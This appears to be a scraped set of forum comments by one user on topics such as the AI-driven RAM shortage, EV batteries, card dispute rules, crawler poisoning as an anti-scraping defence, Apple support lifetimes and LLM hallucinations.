

Same with RAM.
Unfortunately, the RAM shortage is caused by a RAM component being diverted to specialized packages that can’t easily be converted into normal RAM. So even a bubble bursting won’t bring RAM onto the market.


Same with RAM.
Unfortunately, the RAM shortage is caused by a RAM component being diverted to specialized packages that can’t easily be converted into normal RAM. So even a bubble bursting won’t bring RAM onto the market.


Well if you want to read about the many battery chemistries currently in use in EVs, there’s this article:
https://insideevs.com/news/782685/all-ev-battery-chemistries-explained/
As the article explains, there are several chemistries that have already come and gone, and the current models being sold use a few competing chemistries with their tradeoffs. Some of the up and coming chemistries are also already being mass produced.
So whatever it is you mean by “leap,” it sounds like it’s already been happening in the last 15-20 years.


Visa/Mastercard requires all cardholders, cardholders’ banks, merchants, and merchants’ processors to follow the comprehensive set of rules for disputed transactions. That way the dispute process tends to be uniform across different banks and across different merchant/payment processors.
The network sets the rules, while the banks implement those rules on behalf of the cardholder and the processor implements those rules on behalf of the merchant.
So replacing the network will require a comprehensive replacement for the network’s dispute resolution rules (assigning who is responsible for paying when certain things happens) and procedures (how a cardholder can initiate a dispute and how that gets resolved).


Or, if the app has the private key for decryption for the user to be able to see the messages, what’s stopping the app from copying that decrypted text somewhere else?
The thread model isn’t usually key management, it’s more about the insecure treatment of the decrypted message after decryption.


90GB of both RAM+NAND combined. I’m guessing most of it is actual persistent storage for all the stuff the infotainment system uses (including imagery and offline map data for GPS, which is probably a big one), rather than actual memory in the sense of desktop computing.


Everything else that you said seems to fit the general thesis that they’re making a lot more money selling to AI companies.
If those reasons were still true but the memory companies stood to not make as much money on those deals, I guarantee the memory manufacturers wouldn’t have taken the deal. They only care about money, and the other reasons you list are just the mechanisms for making more money.


It’s a very common complaint among people administering websites. This particular AI poisoning service seems to be directed at those people.
So maybe it’s not the majority of complaints about AI, but it’s a significant portion of the complaints about AI from site administrators.


The Fediverse is designed specifically to publish its data for others to use in an open manner.
Sure, and if the AI companies want to configure their crawlers to actually use APIs and ActivityPub to efficiently scrape that data, great. Problem is that there’s been crawlers that have done things very inefficiently (whether by malice, ignorance, or misconfiguration) and scrape the HTML of sites repeatedly, driving up some hosting costs and effectively DOSing some of the sites.
If you put Honeypot URLs in the mix and keep out polite bots with robots.txt and keep out humans by hiding those links, you can serve poisoned responses only to the URLs that nobody should be visiting and not worry too much about collateral damage to legitimate visitors.


What’s crazy is that they aren’t just doing this because they make more money with AI.
No, they really are making more money by selling whole wafers rather than packaging and soldering onto DIMMs. The AI companies are throwing so much money at this that it’s just much more profitable for the memory companies to sell directly to them.


That’s why “bullshit,” as defined by Harry Frankfurt, is so useful for describing LLMs.
A lie is a false statement that the speaker knows to be false. But bullshit is a statement made by a speaker who doesn’t care if it’s true or false.


If I am reading this correctly, anyone who wants to use this service can just configure their HTTP server to act as the man in the middle of the request, so that the crawler sees your URL but is retrieving poison fountain content from the poison fountain service.
If so, that means the crawlers wouldn’t be able to filter by URL because the actual handler that responds to the HTTP request doesn’t ever see the canonical URL of the poison fountain.
In other words, the handler is “self hosted” at its own URL while the stream itself comes from the same URL that the crawler never sees.


The hot concept around the late 2000’s and early 2010’s was crowdsourcing: leveraging the expertise of volunteers to build consensus. Quora, Stack Overflow, Reddit, and similar sites came up in that time frame where people would freely lend their expertise on a platform because that platform had a pretty good rule set for encouraging that kind of collaboration and consensus building.
Monetizing that goodwill didn’t just ruin the look and feel of the sites: it permanently altered people’s willingness to participate in those communities. Some, of course, don’t mind contributing. But many do choose to sit things out when they see the whole arrangement as enriching an undeserving middleman.


Most Android phones with always on have a grayscale screen that is mostly black. But iPhones introduced always on with 1Hz screens and still show a less saturated, less bright version of the color wallpaper on the lock screen.


On phones and tablets, variable refresh rates make an “always on” display feasible in terms of battery budget, where you can have something like a lock screen turned on at all times without burning through too much power.
On laptops, this might open up some possibilities of the lock screen or some kind of static or slideshow screensaver staying on longer while idle, before turning off the display.


It’s a fancy marketing term for when AI confidently does something in error.
How can the AI be confident?
We anthropomorphize the behaviors of these technologies to analogize their outputs to other phenomena observed in humans. In many cases, the analogy helps people decide how to respond to the technology itself, and that class of error.
Describing things in terms of “hallucinations” tell users that the output shouldn’t always be trusted, regardless of how “confident” the technology seems.


Apple supports its devices for a lot longer than most OEMs after release (minimum 5 years since being available for sale from Apple, which might be 2 years of sales), but the impact of dropped support is much more pronounced, as you note. Apple usually announces obsolescence 2 years after support ends, too, and stop selling parts and repair manuals, except a few batteries supported to the 10 year mark. On the software/OS side, that usually means OS upgrades for 5-7 years, then 2 more years of security updates, for a total of 7-9 years of keeping a device reasonably up to date.
So if you’re holding onto a 5-year-old laptop, Apple support tends to be much better than a 5-year-old laptop from a Windows OEM (especially with Windows 11 upgrade requirements failing to support some devices that were on sale at the time of Windows 11’s release).
But if you’ve got a 10-year-old Apple laptop, it’s harder to use normally than a 10-year-old Windows laptop.
Also, don’t use the Apple store for software on your laptop. Use a reasonable package manager like homebrew that doesn’t have the problems you describe. Or go find a mirror that hosts old MacOS packages and install it yourself.


Even the human eye basically follows the same principle. We have 3 types of cones, each sensitive to different portions of wavelength, and our visual cortex combines each cone cell’s single-dimensional inputs representing the intensity of light hitting that cell in its sensitivity range, from both eyes, plus the information from the color-blind rods, into a seamless single image.


This write-up is really, really good. I think about these concepts whenever people discuss astrophotography or other computation-heavy photography as being fake software generated images, when the reality of translating the sensor data with a graphical representation for the human eye (and all the quirks of human vision, especially around brightness and color) needs conscious decisions on how those charges or voltages on a sensor should be translated into a pixel on digital file.


my general computing as a subscription to a server.
You say this, but I think most of us have offloaded formerly local computing to a server of some kind:
All these things used to be local uses of computing, and can now be accessed from low powered smartphones. Things like Chromebooks give a user access to between 50-100% of what they’d be doing on a full fledged high powered desktop, depending on the individual needs and use cases.
The judge controls when the jury is in the room. So the jury enters last, only after the judge orders them in. And the judge can order them out at any time to have discussions outside their presence, too.